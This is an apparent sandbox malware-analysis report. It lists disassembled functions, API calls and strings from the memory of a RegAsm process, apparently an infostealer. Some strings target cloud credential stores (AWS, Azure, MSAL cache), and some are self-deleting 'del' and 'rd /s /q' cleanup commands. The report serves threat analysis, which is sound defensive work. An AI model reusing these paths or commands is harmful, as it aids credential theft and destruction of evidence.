Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologmemsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 2836893066-974132213
Opcode ID: 99a983ba3266736b86dd31781e36979411601fa549d39b378e2de5970b75a7a7
Instruction ID: cd50fd36803983707099e9875aa7b38f9f78819dfc4554b828524a51e5953c64
Opcode Fuzzy Hash: 99a983ba3266736b86dd31781e36979411601fa549d39b378e2de5970b75a7a7
Instruction Fuzzy Hash: 3941A4B1D44218BACB10EBA0DC46FEE77BCAB0C308F44055FB555A3182DA7C9B88CB65

Function 1B567FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON

Download Yara Rule

Strings

winGetTempname5, xrefs: 1B568233
winGetTempname4, xrefs: 1B568355
winGetTempname2, xrefs: 1B568094
winGetTempname1, xrefs: 1B56817B
etilqs_, xrefs: 1B56824C

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 0-2933911573
Opcode ID: f16155d9414ffb382a9511813790724eb7698affbba5c3282be00154b5b4eb72
Instruction ID: ae16c0eedc31a903e2c7f9b54f2a3030b2b8095c52a1db5571716e0cd87b623c
Opcode Fuzzy Hash: f16155d9414ffb382a9511813790724eb7698affbba5c3282be00154b5b4eb72
Instruction Fuzzy Hash: 7DA19CF6A003415BF7009B349C81BEA779D9F81365F84056BEC949B282E62BE11FC3B1

Function 1B3F2BE0 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 346COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B3F2E69
ORDER BY name, xrefs: 1B3F2DCC
%s at line %d of [%.10s], xrefs: 1B3F2E78
misuse, xrefs: 1B3F2E73
invalid, xrefs: 1B3F2E4E
WHERE name=%Q, xrefs: 1B3F2DB7
unopened, xrefs: 1B3F2E55
NULL, xrefs: 1B3F2E38
API call with %s database connection pointer, xrefs: 1B3F2E5A
SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0), xrefs: 1B3F2DA4

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: ORDER BY name$%s at line %d of [%.10s]$API call with %s database connection pointer$NULL$SELECT * FROM (SELECT 'sqlite_schema' AS name,1 AS rootpage,'table' AS type UNION ALL SELECT name,rootpage,type FROM "%w".sqlite_schema WHERE rootpage!=0)$WHERE name=%Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$invalid$misuse$unopened
API String ID: 0-1179878930
Opcode ID: 5ca1db28ad5a061396588da34585d17ef20c8b557a09716bbc7973cc0a77973c
Instruction ID: 7bd0a1e7bf6919891c021c71cd2fb5bb90f0de7104506ade36e1d64d0a16c8bf
Opcode Fuzzy Hash: 5ca1db28ad5a061396588da34585d17ef20c8b557a09716bbc7973cc0a77973c
Instruction Fuzzy Hash: 11C145B1904340DBEB108F14CC85BDB77A9AF90315F44462DFC999B242E335E9AAC7A3

Function 00409299 Relevance: 30.4, APIs: 20, Instructions: 407stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040929E

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00411805: _EH_prolog.MSVCRT ref: 0041180A
Part of subcall function 00411805: GetSystemTime.KERNEL32(?,00427520,00000001,000000C8,00000000,00427722), ref: 0041184A

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004094EE
HeapAlloc.KERNEL32(00000000), ref: 004094F5
lstrcat.KERNEL32(00000000,00000000), ref: 00409618
lstrcat.KERNEL32(00000000,00426E64), ref: 00409626
lstrcat.KERNEL32(00000000,00000000), ref: 00409638
lstrcat.KERNEL32(00000000,00426E68), ref: 00409646
lstrlenA.KERNEL32(00000000), ref: 00409759
lstrlenA.KERNEL32(00000000), ref: 00409767

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415718: _EH_prolog.MSVCRT ref: 0041571D
Part of subcall function 00415718: CreateThread.KERNEL32(00000000,00000000,00413F49,?,00000000,00000000), ref: 004157C3
Part of subcall function 00415718: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004157CB

memset.MSVCRT ref: 004097BF

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcat$lstrcpy$lstrlen$Heap$AllocCreateObjectProcessSingleSystemThreadTimeWaitmemset
String ID:
API String ID: 1592390033-0
Opcode ID: 09a026441be33cc386674e0cc7f3362a1763fb07294c953234e0a131af0e1e31
Instruction ID: 9f9d1155ec292d32eaef691f149ba7ea37ba11bc52a51284ec4616e86aa69bd0
Opcode Fuzzy Hash: 09a026441be33cc386674e0cc7f3362a1763fb07294c953234e0a131af0e1e31
Instruction Fuzzy Hash: 1AF18B31800248EEDF05EBE0DD5AAEEBB75AF15308F10405EF415B2192DFB81A98DB66

Function 004129B8 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 325stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004129BD
strtok_s.MSVCRT ref: 004129EE
StrCmpCA.SHLWAPI(?,true,?,?,00000104,?,00000104,?,?,00000000), ref: 00412A86

Part of subcall function 00410640: lstrlenA.KERNEL32(?,00000000,?,00417C9B,0042771F,0042771E,00000000,00000000,?,0041867E), ref: 00410649
Part of subcall function 00410640: lstrcpy.KERNEL32(00000000,00000000), ref: 0041067D

lstrcpy.KERNEL32(?,?), ref: 00412B3D
lstrcpy.KERNEL32(?,00000000), ref: 00412B79
lstrcpy.KERNEL32(?,00000000), ref: 00412BC0
lstrcpy.KERNEL32(?,00000000), ref: 00412C07
lstrcpy.KERNEL32(?,00000000), ref: 00412C4E
strtok_s.MSVCRT ref: 00412DB1

Strings

true, xrefs: 00412A7E
false, xrefs: 00412AA0

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$H_prologlstrlen
String ID: false$true
API String ID: 49562497-2658103896
Opcode ID: 438b9266c1b270ba0aa57f5ab082b7f887f75eb33529ee2fe3a6dcc5bd2650be
Instruction ID: 0b9154766426e93d0854e19574322a0d814bf7a07209f66ceee8826b23049e8e
Opcode Fuzzy Hash: 438b9266c1b270ba0aa57f5ab082b7f887f75eb33529ee2fe3a6dcc5bd2650be
Instruction Fuzzy Hash: 7BC17FB1900209EFDF24EFA4D945EDE77B8BF14304F10405AF519E7191EB78AA89CB64

Function 1B4F5D70 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 266COMMON

Download Yara Rule

Strings

crisismerge, xrefs: 1B4F5EF7
pgsz, xrefs: 1B4F5D81
automerge, xrefs: 1B4F5E59
hashsize, xrefs: 1B4F5DF0
rank, xrefs: 1B4F5FBB
deletemerge, xrefs: 1B4F5F64
secure-delete, xrefs: 1B4F6031
usermerge, xrefs: 1B4F5EAD

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: automerge$crisismerge$deletemerge$hashsize$pgsz$rank$secure-delete$usermerge
API String ID: 0-3330941169
Opcode ID: f9f727129c91cbefc558e4acafdc7b9a436dd49c25dfe949ee220437c9d790bf
Instruction ID: be5c6914890ca27cc7aab607b05a98a728af02bf1b0af623c12070bfbb1914a8
Opcode Fuzzy Hash: f9f727129c91cbefc558e4acafdc7b9a436dd49c25dfe949ee220437c9d790bf
Instruction Fuzzy Hash: 677115BAF002115BDA00DB2DAC41ACE7BD4EFC5212F1444BDF946C7351EB25E95AC6E2

Function 00412DE2 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412DE7
StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00417FDD), ref: 00412E09
ExitProcess.KERNEL32 ref: 00412E14
strtok_s.MSVCRT ref: 00412E2B

Strings

block, xrefs: 00412DF4

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExitH_prologProcessstrtok_s
String ID: block
API String ID: 3745986650-2199623458
Opcode ID: 89edf6555e04d225106bb0a4c2e79bd1d1660ea8a701833d924eebbdd4ea7cb8
Instruction ID: b7575eb9cad01e5cb02dac5751334a303c423716fcd5b095fb43813b11e280dc
Opcode Fuzzy Hash: 89edf6555e04d225106bb0a4c2e79bd1d1660ea8a701833d924eebbdd4ea7cb8
Instruction Fuzzy Hash: E241E670B44302AACB10AF71DE45BE737BCBB11744B60062BB11BD7540E7B8A4939B1C

Function 1B3E5E20 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 496COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B3E5F2B, 1B3E6253, 1B3E6385
%s at line %d of [%.10s], xrefs: 1B3E5F3A, 1B3E6262, 1B3E6394
misuse, xrefs: 1B3E5F35, 1B3E625D, 1B3E638F
SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id', xrefs: 1B3E5E6F
API called with finalized prepared statement, xrefs: 1B3E5F1F, 1B3E6247, 1B3E6379
no such fts5 table: %s.%s, xrefs: 1B3E62EA
recursive definition for %s.%s, xrefs: 1B3E5E4C

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT t.%Q FROM %Q.%Q AS t WHERE t.%Q MATCH '*id'$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such fts5 table: %s.%s$recursive definition for %s.%s
API String ID: 0-1070437968
Opcode ID: 3398b5e8bc4c007dee91a91a511bd3032d5dd07d4734217ff76b23e5f597cbb8
Instruction ID: f3ece1eff8f2a01120ef91af077ddd4392e902a3672344ddd94882b79cd88f8f
Opcode Fuzzy Hash: 3398b5e8bc4c007dee91a91a511bd3032d5dd07d4734217ff76b23e5f597cbb8
Instruction Fuzzy Hash: 7C02F4B19047619BE711CF24CC85BDB77E8BF84215F04462EF8858B242E731E969CBB2

Function 1B459980 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 429COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B459A35, 1B459D90
API called with NULL prepared statement, xrefs: 1B459A04
%s at line %d of [%.10s], xrefs: 1B459A44, 1B459D9F
misuse, xrefs: 1B459A3F, 1B459D9A
API called with finalized prepared statement, xrefs: 1B459A19, 1B459D84
SELECT %s, xrefs: 1B4599B1
no such function: %s, xrefs: 1B459E8C

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$SELECT %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$no such function: %s
API String ID: 0-3900766660
Opcode ID: 67a90fd8f2bae3c8554b6add96506fcea2a1f50ca87da8484f894de7bb8cbc38
Instruction ID: 9ab0c42852b24c04fcf864aaf85d1a828ece38b53d8a61d447b523aba1deea71
Opcode Fuzzy Hash: 67a90fd8f2bae3c8554b6add96506fcea2a1f50ca87da8484f894de7bb8cbc38
Instruction Fuzzy Hash: 24E119B8904B419BE710CF24DC85BDB77E9BF86715F04852CE8899B341E735E849CBA2

Function 1B413800 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 184COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B413930
%s at line %d of [%.10s], xrefs: 1B41393F
misuse, xrefs: 1B41393A
API called with finalized prepared statement, xrefs: 1B413924
real, xrefs: 1B413895, 1B4138EC
null, xrefs: 1B4138E7
no such rowid: %lld, xrefs: 1B4139F8
integer, xrefs: 1B41389A
cannot open value of type %s, xrefs: 1B4138ED

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$cannot open value of type %s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$integer$misuse$no such rowid: %lld$null$real
API String ID: 0-1477268580
Opcode ID: cc86417e1326dc017fe06977784e9f32fe8ead538ce5374dcd0936c07882dd7e
Instruction ID: ffe7e9292c2328ac7f1db9df0bd00a7f98bbc71e7b15e6f93df5e55890341316
Opcode Fuzzy Hash: cc86417e1326dc017fe06977784e9f32fe8ead538ce5374dcd0936c07882dd7e
Instruction Fuzzy Hash: 4B5101B5A04301AFEB109F28DC80AD6B3F4FF84315F04896DE9468B741EB35F8588BA1

Function 0041434F Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 153COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00414354
memset.MSVCRT ref: 00414374
memset.MSVCRT ref: 00414380
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,00000000), ref: 00414395

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

ShellExecuteEx.SHELL32(0000003C), ref: 00414521
memset.MSVCRT ref: 0041452E
memset.MSVCRT ref: 0041453C
ExitProcess.KERNEL32 ref: 0041454D

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Strings

/c timeout /t 10 & del /f /q ", xrefs: 004143BB
" & exit, xrefs: 004144C2
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00414475
<, xrefs: 004144FC
" & rd /s /q "C:\ProgramData\, xrefs: 0041440B
" & exit, xrefs: 0041445E

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpymemset$H_prolog$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
API String ID: 1312519015-206210831
Opcode ID: 2d09a06c7d9d0af9c5ca36505b92e4b60782a69951f56492e9a94d1151a1df7a
Instruction ID: 84bfe171ee1f57b82efcb0644381c9031b31b01cef03da166d5605eac92fdf66
Opcode Fuzzy Hash: 2d09a06c7d9d0af9c5ca36505b92e4b60782a69951f56492e9a94d1151a1df7a
Instruction Fuzzy Hash: 9651F6B1C04248EEDB01EBE5C995EDEBBB8AF14308F50005EE505B7182DBB95BC9CB65

Function 1B4FF370 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 196COMMON

Download Yara Rule

Strings

id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER, xrefs: 1B4FF51C
id INTEGER PRIMARY KEY, sz BLOB, xrefs: 1B4FF524, 1B4FF52C
, c%d, xrefs: 1B4FF469
content, xrefs: 1B4FF49D
version, xrefs: 1B4FF560
k PRIMARY KEY, v, xrefs: 1B4FF544
id INTEGER PRIMARY KEY, xrefs: 1B4FF43E
docsize, xrefs: 1B4FF52D
config, xrefs: 1B4FF549

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
